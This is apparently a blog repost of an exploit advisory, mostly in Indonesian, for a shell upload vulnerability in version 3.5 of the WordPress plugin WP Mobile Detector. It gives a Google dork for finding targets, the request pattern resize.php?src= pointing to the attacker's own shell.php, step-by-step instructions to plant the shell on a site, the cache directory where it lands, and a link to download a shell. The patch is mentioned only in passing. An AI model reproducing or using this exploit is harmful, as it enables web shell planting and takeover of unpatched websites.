Thursday, February 23, 2017
WordPress Plugins WP Mobile Detector Shell Upload Vulnerability
WordPress Plugins WP Mobile Detector Shell Upload Vulnerability
#- Title: WordPress Plugins WP Mobile Detector Shell Upload Vulnerability
#- Author: aaditya purani
#- Date: 2016/06/03
#- Developer : Jesse Friedman
#- Link Download : wordpress. org/plugins/wp-mobile-detector
#- Google Dork: inurl:"/plugins/wp-mobile-detector/"
#- Fixed in Version : 3.6 / Fixed exploit with resize script.
#- Tested on : windows
=======================================================
-- Proof Of Concept --
Description :
Kelemahan ini telah terpecahkan untuk publik yaitu WP Mobile Detector Arbitrary File upload untuk versi 3.5. Dimana seorang attacker dapat mengupload Malicious File / shell ke dalam sebuah website. Lebih dari 10.000 website terinfeksi bug ini. Tetapi vendor sudah merilis patch terbaru dari versi ini aitu versi 3.6 dan versi 3.7. Bahkan Securi sudah mempublikasikan kerentanan ini.
Vulnerability : site/wp-content/plugins/wp-mobile-detector/resize.php?src=[link to your shell.php]
Method :
1. Cari Target.
2. Target/wp-content/plugins/wp-mobile-detector/resize.php?src=Link Shell Kamu3. Jika berhasil maka shell tersebut akan tersimpan di dir /cache/
Format Shell > php
Need Shell Path ? Click Here
Available link for download